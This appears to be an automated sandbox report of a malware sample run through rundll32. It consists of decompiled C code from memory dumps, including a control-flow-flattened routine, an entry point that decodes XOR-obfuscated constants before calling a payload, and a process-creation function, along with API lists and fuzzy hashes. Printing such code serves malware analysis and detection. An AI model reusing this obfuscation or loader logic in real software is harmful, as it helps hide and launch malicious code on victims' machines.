                                                                                                                                  						} else {
                                                                                                                                  							goto L11;
                                                                                                                                  						}
                                                                                                                                  						do {
                                                                                                                                  							L11:
                                                                                                                                  							__eflags =  *_t368 - 0x2c;
                                                                                                                                  							if( *_t368 != 0x2c) {
                                                                                                                                  								goto L17;
                                                                                                                                  							}
                                                                                                                                  							_t438 =  &_v1560;
                                                                                                                                  							while(1) {
                                                                                                                                  								_t368 =  &(_t368[1]);
					_t405 =  *_t368 & 0x0000ffff;
					__eflags = _t405;
					if(_t405 == 0) {
						break;
					}
					__eflags = _t405 - 0x20;
					if(_t405 == 0x20) {
						break;
					}
					 *_t438 = _t405;
					_t438 =  &(_t438[0]);
					__eflags = _t438;
				}
				_t395 = 0;
				__eflags = 0;
				 *_t438 = 0;
				L17:
				_t368 =  &(_t368[1]);
				__eflags =  *_t368 - _t383;
			} while (__eflags != 0);
			goto L18;
		}
		if(_t439 == 0x99a67ee) {
			_t445 = E002DF899(_t395);
			_t439 = 0x92208ae;
			continue;
		}
		if(_t439 == 0x9e65a83) {
			_push(_v1612);
			_push(_v1636);
			_push(_v1688);
			_push( &_v520); // executed
			E002E46BB(_v1672, _v1620); // executed
			E002EDA22(_v1700, _v1680, __eflags, _v1656,  &_v1040, _v1672, _v1628);
			_push(_v1564);
			_push(_v1580);
			E002D47CE( &_v520, _v1684, _v1640, _v1596, _v1568, E002EDCF7(_v1640, 0x2d1140, __eflags),  &_v1040, _v1692, _v1632);
			_t395 = _v1584;
			E002DA8B0(_t395, _t375, _v1592);
			_t446 = _t446 - 0xc + 0x58;
			_t439 = 0x2f8e73a;
			continue;
		}
		_t457 = _t439 - 0xeef82b0;
		if(_t439 == 0xeef82b0) {
			_push(_v1696);
			_push(_v1652);
			_t381 = E002DB23C(_v1572, _v1576, E002EDCF7(_v1644, 0x2d10c0, _t457), _v1600, _v1664,  &_v1560); // executed
			_t395 = _v1648;
			asm("sbb edi, edi");
			_t439 = ( ~_t381 & 0xfbf501ac) + 0xdf158d7;
			E002DA8B0(_t395, _t379, _v1588);
			_t446 =  &(_t446[7]);
		}
		L20:
		if(_t439 != 0xdf158d7) {
			continue;
		}
		goto L23;
	}
	E002D4B61( &_v1560, 0x208, _v1616, _v1624);
	_pop(_t395);
	_t439 = 0x99a67ee;
	goto L20;
}
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dff6c
                                                                                                                                  0x002dff81
                                                                                                                                  0x002dff81
                                                                                                                                  0x002dff84
                                                                                                                                  0x002dff87
                                                                                                                                  0x002dff8a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dff75
                                                                                                                                  0x002dff79
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dff7b
                                                                                                                                  0x002dff7e
                                                                                                                                  0x002dff7e
                                                                                                                                  0x002dff7e
                                                                                                                                  0x002dff8c
                                                                                                                                  0x002dff8c
                                                                                                                                  0x002dff8e
                                                                                                                                  0x002dff91
                                                                                                                                  0x002dff91
                                                                                                                                  0x002dff94
                                                                                                                                  0x002dff94
                                                                                                                                  0x00000000
                                                                                                                                  0x002dff66
                                                                                                                                  0x002dfe0a
                                                                                                                                  0x002dff52
                                                                                                                                  0x002dff54
                                                                                                                                  0x00000000
                                                                                                                                  0x002dff54
                                                                                                                                  0x002dfe16
                                                                                                                                  0x002dfe8f
                                                                                                                                  0x002dfe9a
                                                                                                                                  0x002dfe9e
                                                                                                                                  0x002dfead
                                                                                                                                  0x002dfeae
                                                                                                                                  0x002dfecf
                                                                                                                                  0x002dfed4
                                                                                                                                  0x002dfee0
                                                                                                                                  0x002dff22
                                                                                                                                  0x002dff2e
                                                                                                                                  0x002dff37
                                                                                                                                  0x002dff3c
                                                                                                                                  0x002dff3f
                                                                                                                                  0x00000000
                                                                                                                                  0x002dff3f
                                                                                                                                  0x002dfe18
                                                                                                                                  0x002dfe1e
                                                                                                                                  0x002dfe24
                                                                                                                                  0x002dfe2d
                                                                                                                                  0x002dfe5e
                                                                                                                                  0x002dfe6a
                                                                                                                                  0x002dfe74
                                                                                                                                  0x002dfe7c
                                                                                                                                  0x002dfe82
                                                                                                                                  0x002dfe87
                                                                                                                                  0x002dfe87
                                                                                                                                  0x002dffc3
                                                                                                                                  0x002dffc9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002dffcf
                                                                                                                                  0x002dffb7
                                                                                                                                  0x002dffbd
                                                                                                                                  0x002dffbe
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FolderPath
                                                                                                                                  • String ID: '+=$F8y$PG&$Qec$RYt$oq$wpc$zn $Y
                                                                                                                                  • API String ID: 1514166925-3316477785
                                                                                                                                  • Opcode ID: 432887e26f827acec335b423d88e0cdcf54da50756b1309b11abac28f8d15828
                                                                                                                                  • Instruction ID: 5b5d8903d7a71f567c1552bff03628dfeb4e99976a5c74abc5c972aa2acfc61d
                                                                                                                                  • Opcode Fuzzy Hash: 432887e26f827acec335b423d88e0cdcf54da50756b1309b11abac28f8d15828
                                                                                                                                  • Instruction Fuzzy Hash: BB0232725083818FD368CF25C58AA0BFBE2BBC5718F108A1EF1D986260D7B58959CF47
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 267 2de991-2dea60 268 2dea90-2dea96 267->268 269 2dea62-2dea77 call 2df8fd 267->269 269->268 272 2dea79-2dea88 call 2d93ed 269->272 274 2dea8d 272->274 274->268
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			_entry_(intOrPtr _a4, char _a8) {
                                                                                                                                  				unsigned int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				intOrPtr _v36;
                                                                                                                                  				intOrPtr _v40;
                                                                                                                                  				intOrPtr _v44;
                                                                                                                                  				signed int _t85;
                                                                                                                                  				signed int _t86;
                                                                                                                                  				signed int _t87;
                                                                                                                                  
                                                                                                                                  				_v32 = _v32 & 0x00000000;
                                                                                                                                  				_v44 = 0xa88528;
                                                                                                                                  				_v40 = 0x811176;
                                                                                                                                  				_v36 = 0xed2c64;
                                                                                                                                  				_v20 = 0x893932;
                                                                                                                                  				_v20 = _v20 ^ 0x2faf083b;
                                                                                                                                  				_v20 = _v20 ^ 0x2f2d1c53;
                                                                                                                                  				_v8 = 0xbe2d1;
                                                                                                                                  				_t85 = 0x2e;
                                                                                                                                  				_v8 = _v8 / _t85;
                                                                                                                                  				_v8 = _v8 >> 0xd;
                                                                                                                                  				_v8 = _v8 + 0xffff961f;
                                                                                                                                  				_v8 = _v8 ^ 0xfff451d0;
                                                                                                                                  				_v16 = 0x50855f;
                                                                                                                                  				_v16 = _v16 >> 8;
                                                                                                                                  				_t86 = 0x5e;
                                                                                                                                  				_v16 = _v16 / _t86;
                                                                                                                                  				_v16 = _v16 ^ 0x0002614f;
                                                                                                                                  				_v28 = 0x752e5d;
                                                                                                                                  				_t36 =  &_v28; // 0x752e5d
                                                                                                                                  				_t87 = 0x4e;
                                                                                                                                  				_v28 =  *_t36 * 0x6f;
                                                                                                                                  				_v28 = _v28 ^ 0x32c1ec83;
                                                                                                                                  				_v12 = 0xba9db2;
                                                                                                                                  				_v12 = _v12 * 0x41;
                                                                                                                                  				_v12 = _v12 + 0xfc46;
                                                                                                                                  				_v12 = _v12 | 0x4911db39;
                                                                                                                                  				_v12 = _v12 ^ 0x6f7f0271;
                                                                                                                                  				_v24 = 0x2e0372;
                                                                                                                                  				_v24 = _v24 / _t87;
                                                                                                                                  				_v24 = _v24 ^ 0x000c7ca5;
                                                                                                                                  				_t58 =  &_a8;
                                                                                                                                  				 *_t58 = _a8 - 1;
                                                                                                                                  				if( *_t58 == 0) {
                                                                                                                                  					 *0x2f320c = _a4;
                                                                                                                                  					if(E002DF8FD() != 0) {
                                                                                                                                  						E002D93ED(); // executed
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return 1;
                                                                                                                                  			}

















                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess
                                                                                                                                  • String ID: ].u$d,
                                                                                                                                  • API String ID: 621844428-1507873175
                                                                                                                                  • Opcode ID: 28e6a2af7b2208f69e6950f18d2eac72de15b9538877aa2b1a92d7c9396dc74f
                                                                                                                                  • Instruction ID: 0095815b3e43e42d0b9f8d70fbca3eb9a6e95d27521f6b72bb983f23b32004ab
                                                                                                                                  • Opcode Fuzzy Hash: 28e6a2af7b2208f69e6950f18d2eac72de15b9538877aa2b1a92d7c9396dc74f
                                                                                                                                  • Instruction Fuzzy Hash: E831F4B1D0020AEBDB08DFA4DA8A59EBBF0FB54314F208199D510BB254D7B45B959F80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 288 2dab87-2dad94 call 2e20b9 call 2d4b61 call 2d7f5d 294 2dad99-2dad9e 288->294 295 2daddd 294->295 296 2dada0-2dada2 294->296 297 2daddf-2dade5 295->297 298 2dada4-2dadaa 296->298 299 2dadb0-2daddb call 2e1e67 * 2 296->299 300 2dadab-2dadae 298->300 299->300 300->297
                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                  			E002DAB87(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                  				void* _t151;
                                                                                                                                  				void* _t163;
                                                                                                                                  				void* _t164;
                                                                                                                                  				signed int _t169;
                                                                                                                                  				signed int _t170;
                                                                                                                                  				signed int _t171;
                                                                                                                                  				intOrPtr _t187;
                                                                                                                                  				intOrPtr _t190;
                                                                                                                                  				intOrPtr* _t193;
                                                                                                                                  				void* _t194;
                                                                                                                                  
                                                                                                                                  				_t193 = _t194 - 0x5c;
                                                                                                                                  				_push( *((intOrPtr*)(_t193 + 0x7c)));
                                                                                                                                  				_t187 =  *((intOrPtr*)(_t193 + 0x6c));
                                                                                                                                  				_push( *((intOrPtr*)(_t193 + 0x78)));
                                                                                                                                  				_push(0);
                                                                                                                                  				_push( *((intOrPtr*)(_t193 + 0x70)));
                                                                                                                                  				_push(_t187);
                                                                                                                                  				_push( *((intOrPtr*)(_t193 + 0x68)));
                                                                                                                                  				_push( *((intOrPtr*)(_t193 + 0x64)));
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t151);
                                                                                                                                  				 *(_t193 + 0x18) =  *(_t193 + 0x18) & 0x00000000;
                                                                                                                                  				 *((intOrPtr*)(_t193 + 0xc)) = 0xc7e504;
                                                                                                                                  				 *((intOrPtr*)(_t193 + 0x10)) = 0xaf8af2;
                                                                                                                                  				 *((intOrPtr*)(_t193 + 0x14)) = 0x514a6e;
                                                                                                                                  				 *(_t193 + 0x34) = 0xb35e3d;
                                                                                                                                  				 *(_t193 + 0x34) =  *(_t193 + 0x34) >> 0xc;
                                                                                                                                  				 *(_t193 + 0x34) =  *(_t193 + 0x34) ^ 0x00059917;
                                                                                                                                  				 *(_t193 + 0x1c) = 0xb39a57;
                                                                                                                                  				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb15fb5d5;
                                                                                                                                  				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb1e87bcb;
                                                                                                                                  				 *(_t193 + 0x54) = 0x8cfebd;
                                                                                                                                  				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x2de11ebd;
                                                                                                                                  				 *(_t193 + 0x54) =  *(_t193 + 0x54) >> 7;
                                                                                                                                  				_t169 = 0x1d;
                                                                                                                                  				 *(_t193 + 0x54) =  *(_t193 + 0x54) / _t169;
                                                                                                                                  				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x0009bd52;
                                                                                                                                  				 *(_t193 + 0x24) = 0xadd23a;
                                                                                                                                  				 *(_t193 + 0x24) =  *(_t193 + 0x24) + 0xffffea89;
                                                                                                                                  				 *(_t193 + 0x24) =  *(_t193 + 0x24) ^ 0x00a2a736;
                                                                                                                                  				 *(_t193 + 0x20) = 0x1d5481;
                                                                                                                                  				 *(_t193 + 0x20) =  *(_t193 + 0x20) | 0x53ff6cee;
                                                                                                                                  				 *(_t193 + 0x20) =  *(_t193 + 0x20) ^ 0x53f584ee;
                                                                                                                                  				 *(_t193 + 0x2c) = 0x3c40b3;
                                                                                                                                  				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) + 0xffffdf55;
                                                                                                                                  				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) ^ 0x0031ac36;
                                                                                                                                  				 *(_t193 + 0x3c) = 0x52e0cb;
                                                                                                                                  				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44a49456;
                                                                                                                                  				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44f1a540;
                                                                                                                                  				 *(_t193 + 0x4c) = 0x46a878;
                                                                                                                                  				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) << 0xf;
                                                                                                                                  				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) + 0xffff6c50;
                                                                                                                                  				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) ^ 0x5431f96e;
                                                                                                                                  				 *(_t193 + 0x30) = 0x13da24;
                                                                                                                                  				 *(_t193 + 0x30) =  *(_t193 + 0x30) << 1;
                                                                                                                                  				 *(_t193 + 0x30) =  *(_t193 + 0x30) ^ 0x002ba36f;
                                                                                                                                  				 *(_t193 + 0x44) = 0xdb90c5;
                                                                                                                                  				 *(_t193 + 0x44) =  *(_t193 + 0x44) << 0xf;
                                                                                                                                  				 *(_t193 + 0x44) =  *(_t193 + 0x44) + 0x7bf2;
                                                                                                                                  				 *(_t193 + 0x44) =  *(_t193 + 0x44) ^ 0xc86621d2;
                                                                                                                                  				 *(_t193 + 0x38) = 0xc3d0db;
                                                                                                                                  				 *(_t193 + 0x38) =  *(_t193 + 0x38) << 0xf;
                                                                                                                                  				 *(_t193 + 0x38) =  *(_t193 + 0x38) ^ 0xe86994ab;
                                                                                                                                  				 *(_t193 + 0x58) = 0x1a470a;
                                                                                                                                  				 *(_t193 + 0x58) =  *(_t193 + 0x58) << 1;
                                                                                                                                  				 *(_t193 + 0x58) =  *(_t193 + 0x58) + 0x63a7;
                                                                                                                                  				 *(_t193 + 0x58) =  *(_t193 + 0x58) | 0x340679df;
                                                                                                                                  				 *(_t193 + 0x58) =  *(_t193 + 0x58) ^ 0x343a3883;
                                                                                                                                  				 *(_t193 + 0x40) = 0xc6f633;
                                                                                                                                  				 *(_t193 + 0x40) =  *(_t193 + 0x40) << 3;
                                                                                                                                  				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x74163c66;
                                                                                                                                  				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x722ef2ae;
                                                                                                                                  				 *(_t193 + 0x50) = 0xa2e0bb;
                                                                                                                                  				_t170 = 0x56;
                                                                                                                                  				 *(_t193 + 0x50) =  *(_t193 + 0x50) / _t170;
                                                                                                                                  				 *(_t193 + 0x50) =  *(_t193 + 0x50) + 0x1f8a;
                                                                                                                                  				 *(_t193 + 0x50) =  *(_t193 + 0x50) * 0x7f;
                                                                                                                                  				 *(_t193 + 0x50) =  *(_t193 + 0x50) ^ 0x01094e1c;
                                                                                                                                  				 *(_t193 + 0x28) = 0x4b9267;
                                                                                                                                  				_t171 = 0x28;
                                                                                                                                  				_t115 = _t193 - 0x48; // 0x181c8bbc
                                                                                                                                  				_t172 = _t115;
                                                                                                                                  				 *(_t193 + 0x28) =  *(_t193 + 0x28) / _t171;
                                                                                                                                  				 *(_t193 + 0x28) =  *(_t193 + 0x28) ^ 0x00093005;
                                                                                                                                  				 *(_t193 + 0x48) = 0xd50758;
                                                                                                                                  				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0x7d3d0603;
                                                                                                                                  				 *(_t193 + 0x48) =  *(_t193 + 0x48) << 9;
                                                                                                                                  				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0xd00f781a;
                                                                                                                                  				_push( *(_t193 + 0x1c));
                                                                                                                                  				_push( *(_t193 + 0x34));
                                                                                                                                  				_t190 = 0x44;
                                                                                                                                  				E002D4B61(_t115, _t190);
                                                                                                                                  				 *((intOrPtr*)(_t193 - 0x48)) = _t190;
                                                                                                                                  				_t129 = _t193 - 4; // 0x181c8c00
                                                                                                                                  				_t131 = _t193 - 0x48; // 0x181c8bbc
                                                                                                                                  				_t163 = E002D7F5D(_t115, _t172,  *((intOrPtr*)(_t193 + 0x70)), _t172, _t131, _t172, _t172,  *((intOrPtr*)(_t193 + 0x64)),  *(_t193 + 0x24),  *(_t193 + 0x20),  *(_t193 + 0x2c),  *(_t193 + 0x3c),  *(_t193 + 0x4c),  *((intOrPtr*)(_t193 + 0x78)), _t129); // executed
                                                                                                                                  				if(_t163 == 0) {
                                                                                                                                  					_t164 = 0;
                                                                                                                                  				} else {
                                                                                                                                  					if(_t187 == 0) {
                                                                                                                                  						E002E1E67( *(_t193 + 0x30),  *(_t193 + 0x44),  *(_t193 + 0x38),  *(_t193 + 0x58),  *((intOrPtr*)(_t193 - 4)));
                                                                                                                                  						E002E1E67( *(_t193 + 0x40),  *(_t193 + 0x50),  *(_t193 + 0x28),  *(_t193 + 0x48),  *_t193);
                                                                                                                                  					} else {
                                                                                                                                  						asm("movsd");
                                                                                                                                  						asm("movsd");
                                                                                                                                  						asm("movsd");
                                                                                                                                  						asm("movsd");
                                                                                                                                  					}
                                                                                                                                  					_t164 = 1;
                                                                                                                                  				}
                                                                                                                                  				return _t164;
                                                                                                                                  			}













                                                                                                                                  0x002daddd
                                                                                                                                  0x002dada0
                                                                                                                                  0x002dada2
                                                                                                                                  0x002dadbf
                                                                                                                                  0x002dadd3
                                                                                                                                  0x002dada4
                                                                                                                                  0x002dada7
                                                                                                                                  0x002dada8
                                                                                                                                  0x002dada9
                                                                                                                                  0x002dadaa
                                                                                                                                  0x002dadaa
                                                                                                                                  0x002dadad
                                                                                                                                  0x002dadad
                                                                                                                                  0x002dade5

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID: nJQ
                                                                                                                                  • API String ID: 963392458-2884827605
                                                                                                                                  • Opcode ID: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                                  • Instruction ID: 114a7da7a96a710019d018e3310f70194d77e8d1d4ad17994e9a4e3254b0148e
                                                                                                                                  • Opcode Fuzzy Hash: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                                  • Instruction Fuzzy Hash: CE71F272410288EBCF69CFA4C9498CE3BB2FF48358F108119FE1696220D3B6C969DF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                                  APIs
                                                                                                                                  • _malloc.LIBCMT ref: 10006A9C
                                                                                                                                    • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                                    • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                                    • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap_malloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 501242067-0
                                                                                                                                  • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                  • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                                  • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                  • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                                  • GlobalHandle.KERNEL32(005E89A8), ref: 100208A9
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                                  • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                                  • GlobalHandle.KERNEL32(005E89A8), ref: 100208DB
                                                                                                                                  • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                                  • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                                  • _memset.LIBCMT ref: 10020911
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 496899490-0
                                                                                                                                  • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                  • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                                  • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                  • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • __lock.LIBCMT ref: 1002FA87
                                                                                                                                    • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                                    • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                                    • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                                  • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2714421763-0
                                                                                                                                  • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                  • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                                  • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                  • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

